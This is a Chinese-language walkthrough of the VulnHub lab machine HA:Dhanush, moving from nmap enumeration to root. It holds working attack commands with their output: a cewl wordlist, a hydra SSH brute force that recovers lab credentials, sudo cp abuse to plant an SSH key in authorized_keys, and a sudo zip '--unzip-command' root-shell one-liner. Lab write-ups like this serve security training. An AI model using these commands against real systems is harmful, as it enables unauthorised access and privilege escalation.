vulnhub靶机渗透[HA-Dhanush]

Posted on Edited on In Views: Word count in article: 2.7k Reading time ≈ 10 mins.

名称:HA:Dhanush
发布日期:2019年11月9日

级别:中级
任务:枚举目标计算机并获得root用户访问权限。

下载:

  • Download: https://drive.google.com/file/d/1BfOvrrIqkVeeEhv3j7yASKmVNw-84s3L/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/ha/dhanush.zip
  • Download (Torrent): https://download.vulnhub.com/ha/dhanush.zip.torrent

描述:

Dhanush曾经是武器技术的巅峰之作。 它把战争重新定义到了一个新的高度,并在历史上的所有神话记载中都提到过。
选择你的Dhanush,拉伸琴弦并射击以获取root!枚举是关键!!!!有关印度神话和弓箭的一些信息可能会有所帮助。

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.142.0/24
Nmap scan report for 192.168.142.131
Host is up (0.00030s latency).
MAC Address: 00:0C:29:22:66:8B (VMware)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
root@kali:~# nmap -A -v -sV -Pn -T4 --script=vuln 192.168.142.131
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.142.131:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.142.131:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|_      CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
1
2
3
4
5
6
7
8
9
10
root@kali:~# nmap -p- -A 192.168.142.131
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Dhanush
65345/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
|   256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_  256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)

现在,在进一步之前,此网页可能包含Dhanush的大量信息。 同样,这些可能是用户名或密码。 因此,决定使用cewl命令制作字典。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
root@kali:~# cewl http://192.168.142.131/ -w dict1.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~# cat dict1.txt 
Dhanush
धनष
Lord
Feature
Wielded
the
यद
यग
Arjuna
was
able
his
and
Then
path
The
Header
लनर
भवत
भरत
यत
थनमधर
तदत
मन
सजम
यहम
परत
रणय
सधन
वनशय
दष
कतम
मसस
थपनर
थय
भवम
What
Banner
Dhanushधनष
Weapon
for
shooting
arrows
typically
made
curved
piece
wood
joined
both
ends
Taut
String
दनय
सबस
तशल
धनषWorld
Most
Powerful
Dhanushs
Sharang
Dhanushसरग
Vishnu
Made
Viswakarma
Pinak
Dhanushपनक
ShivaMade
pinak
Gandiv
Dhanushगण
डव
ArjunaMade
Brahma
Portfolio
Choose
Yoursअपन
चन
Heat
Mahabharata
not
lift
against
Family
Gurus
Krishna
tells
him
this
Dhram
Eternal
Truth
war
You
CTF
Warrior
Pick
your
attain
Boot
Hacking
Articles
All
rights
reserved
Scripts
Raj
Aarti
Geet
Yashika
Kavish
Rishab
Japneet
Pavan

爆破ssh的用户名和密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~# hydra -L dict1.txt -P dict1.txt ssh://192.168.142.131 -s 65345 -I -e nsr -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-12-17 22:03:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 13338 login tries (l:114/p:117), ~834 tries per task
[DATA] attacking ssh://192.168.142.131:65345/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 13127 to do in 01:02h, 16 active
[STATUS] 149.67 tries/min, 449 tries in 00:03h, 12892 to do in 01:27h, 16 active
[STATUS] 154.14 tries/min, 1079 tries in 00:07h, 12262 to do in 01:20h, 16 active
[STATUS] 154.67 tries/min, 2320 tries in 00:15h, 11024 to do in 01:12h, 16 active

[STATUS] 151.68 tries/min, 4702 tries in 00:31h, 8643 to do in 00:57h, 16 active
[STATUS] 151.43 tries/min, 7117 tries in 00:47h, 6229 to do in 00:42h, 16 active
[65345][ssh] host: 192.168.142.131   login: pinak   password: Gandiv
[STATUS] attack finished for 192.168.142.131 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-12-17 22:56:20
  • 用户名/密码 —— pinak/Gandiv

现在有了SSH的登录凭据,pinak/Gandiv登录并进行查看。 运行sudo -l命令检查sudoers列表,发现有效的cp命令以sarang用户身份运行,没有任何密码,因此可以使用它。 看一下用户sarang。 在sarang的主目录中,看到一个标记为“ .ssh”的隐藏目录。 试图打开它,但受到限制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
root@kali:~# ssh pinak@192.168.142.131 -p 65345
The authenticity of host '[192.168.142.131]:65345 ([192.168.142.131]:65345)' can't be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.142.131]:65345' (ECDSA) to the list of known hosts.
pinak@192.168.142.131's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Fri Nov  8 09:05:56 2019
pinak@ubuntu:~$ id
uid=1001(pinak) gid=1001(pinak) groups=1001(pinak)
pinak@ubuntu:~$ whoami
pinak
pinak@ubuntu:~$ 
pinak@ubuntu:~$ pwd
/home/pinak
pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ cd /home/sarang
pinak@ubuntu:/home/sarang$ ls -la
total 32
drwxr-xr-x 4 sarang sarang 4096 Nov  8 08:03 .
drwxr-xr-x 5 root   root   4096 Nov  7 21:01 ..
-rw------- 1 sarang sarang    1 Nov  8 09:07 .bash_history
-rw-r--r-- 1 sarang sarang  220 Nov  7 21:01 .bash_logout
-rw-r--r-- 1 sarang sarang 3771 Nov  7 21:01 .bashrc
drwx------ 2 sarang sarang 4096 Nov  7 21:07 .cache
-rw-r--r-- 1 sarang sarang  807 Nov  7 21:01 .profile
drwx------ 2 sarang sarang 4096 Nov  7 21:35 .ssh
pinak@ubuntu:/home/sarang$ cd .ssh
-bash: cd: .ssh: Permission denied

使用cp命令进入sarang用户。 需要将ssh密钥显示在sarang用户主目录内的.ssh目录中。 尽管该文件只能读取,但可以使用cp命令在该目录中发送密钥。 为此,首先需要生成这些密钥。 为此使用ssh-keygen。 使用ssh-keygen后,进入pinak用户主目录内的.ssh目录中以找到id_rsa公钥。 给它适当的权限。 并将其移动到pinak用户主目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
pinak@ubuntu:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinak/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/pinak/.ssh/id_rsa.
Your public key has been saved in /home/pinak/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:M3EjxpbK4Ni6vFhkYjtaUWnV7IRl6gK/2ab8B3FLz+U pinak@ubuntu
The key's randomart image is:
+---[RSA 2048]----+
|      .=o        |
|     o.++.       |
|  . = .oB o      |
|   O +.+++ ..    |
|..= = ++S+ o     |
|.+.o =. .oo E    |
| o+ o o.         |
|.=.o o  .        |
|o +.o...         |
+----[SHA256]-----+
pinak@ubuntu:~$ cd .ssh
pinak@ubuntu:~/.ssh$ ls
id_rsa  id_rsa.pub
pinak@ubuntu:~/.ssh$ chmod 777 id_rsa.pub
pinak@ubuntu:~/.ssh$ cp id_rsa.pub /home/pinak
pinak@ubuntu:~/.ssh$ cd ..
pinak@ubuntu:~$ ls
id_rsa.pub

现在已经转移了公钥,现在使用cp命令作为sarang用户在sarang用户主目录中的.ssh目录中复制公钥了。 需要将sudo与cp命令一起使用,并提供源目录和目标目录。 完成此操作后,只需要使用刚转让的密钥以sarang身份登录即可。 可以看到它运行良好。 以成功的用户身份登录后,再次运行sudo -l命令,因为该用户不是root用户,目标是获得root用户。 看到zip命令具有sudo权限,可滥用该权限来升级此计算机上的特权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
pinak@ubuntu:~$ sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh sarang@127.0.0.1 -i /.ssh/authorized_keys -p 65345
Warning: Identity file /.ssh/authorized_keys not accessible: No such file or directory.
The authenticity of host '[127.0.0.1]:65345 ([127.0.0.1]:65345)' can't be established.
ECDSA key fingerprint is SHA256:QVJEE1sfL5RUI7RaUefp0Cr9woMla1AyMzYAY683i5s.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:65345' (ECDSA) to the list of known hosts.
Enter passphrase for key '/home/pinak/.ssh/id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Thu Nov  7 21:35:24 2019 from 192.168.0.100
sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip

提权

使用最近通过ssh登录的用户sarang。 使用sudo命令列出用户可以使用root特权运行的所有命令,可以看到用户可以以root用户身份运行zip命令,而无需输入任何密码。
因此,现在正在将权限从“sarang”提升到“root”。 创建一个文件“lucifer11”,然后执行命令:首先将文件“lucifer11”压缩,然后将其移动到/tmp/lucifer11.zip文件夹,最后解压缩,然后弹出root的shell,提权成功。

1
2
3
4
5
6
7
8
9
10
11
sarang@ubuntu:~$ touch lucifer11
sarang@ubuntu:~$ ls
lucifer11
sarang@ubuntu:~$ pwd
/home/sarang
sarang@ubuntu:~$ sudo zip /tmp/lucifer11.zip /home/sarang/lucifer11 -T --unzip-command="sh -c /bin/bash"
  adding: home/sarang/lucifer11 (stored 0%)
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# whoami
root

这次提权方式太帅,记下来

1
sudo zip /tmp/lucifer11.zip /home/sarang/lucifer11 -T --unzip-command="sh -c /bin/bash"

获取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
flag.txt
root@ubuntu:/root# cat flag.txt 
          
                                            @p
                                           @@@.
                                          @@@@@
                                         @@@@@@@
                                        *"`]@P ^^
                                           ]@P
                                           ]@P
                               ,,,,        ]@P       ,,gg,,
                           g@@@@@@@@@b     ]@P    ,@@@@@@@@@@g,
                        ,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
                      g@@@@P^`        %NNNNN@NNNNNP          *B@@@g
                    g@@@P`                 -@                   "B@@w
                  ,@@@`                    ]@                      %@@,
                 @@P-                      ]@                        *@@,
              ,@@"                         ]@                          *B@
            ,@N"                          y@@B                            %@,
      ,,  g@P-                            ]@@@P                             *Bg ,gg
      @@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma     : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

Flag太帅,犹如利剑正中敌人心脏!!!然后狠狠穿透!!!

Key:网页用户名收集,hydra爆破,ssh公钥滥用,/usr/bin/zip,/bin/cp的无需root密码的权限滥用。

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…